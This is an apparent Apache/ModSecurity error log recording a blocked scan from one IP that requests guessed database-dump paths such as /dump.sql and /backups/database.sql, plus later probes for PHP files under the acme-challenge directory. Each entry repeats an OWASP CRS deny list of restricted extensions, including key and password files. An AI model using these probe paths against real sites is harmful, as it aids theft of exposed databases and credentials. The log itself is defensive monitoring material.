[id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "acgxuDY61sl6NLdDvEz5DAAAANg"] [Sat Mar 28 21:53:32.168095 2026] [:error] [pid 30494:tid 30519] [client 34.100.135.49:60605] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/database.sql"] [unique_id "acgxvDY61sl6NLdDvEz5JgAAANc"] [Sat Mar 28 21:53:35.025797 2026] [:error] [pid 30349:tid 30414] [client 34.100.135.49:64439] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backup.sql"] [unique_id "acgxv61YjzjM9ef1gxOXeAAAAEg"] [Sat Mar 28 21:53:38.403382 2026] [:error] [pid 30494:tid 30514] [client 34.100.135.49:52212] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/config/db.sql"] [unique_id "acgxwjY61sl6NLdDvEz5UQAAANI"] [Sat Mar 28 21:53:41.691253 2026] [:error] [pid 16195:tid 16397] [client 34.100.135.49:56038] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/sql/db.sql"] [unique_id "acgxxfkqLRsIcucAZ6XoZgAAAQU"] [Sat Mar 28 21:53:44.931004 2026] [:error] [pid 16195:tid 16390] [client 34.100.135.49:59922] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/data/dump.sql"] [unique_id "acgxyPkqLRsIcucAZ6XoewAAAQA"] [Sat Mar 28 21:53:47.921327 2026] [:error] [pid 16195:tid 16390] [client 34.100.135.49:63789] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/backups/database.sql"] [unique_id "acgxy_kqLRsIcucAZ6XokAAAAQA"] [Sat Mar 28 21:53:51.258366 2026] [:error] [pid 16195:tid 16419] [client 34.100.135.49:51622] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/mysql.sql"] [unique_id "acgxz_kqLRsIcucAZ6XooAAAARY"] [Sat Mar 28 21:53:54.724871 2026] [:error] [pid 16195:tid 16407] [client 34.100.135.49:55386] [client 34.100.135.49] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "acgx0vkqLRsIcucAZ6XorQAAAQo"] [Mon Mar 30 21:35:05.821829 2026] [:error] [pid 9695:tid 9714] [client 20.250.5.104:3994] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Apr 01 20:12:00.875789 2026] [:error] [pid 26573:tid 26605] [client 172.190.142.176:45374] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Apr 01 20:12:03.989576 2026] [:error] [pid 26573:tid 26587] [client 172.190.142.176:28506] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php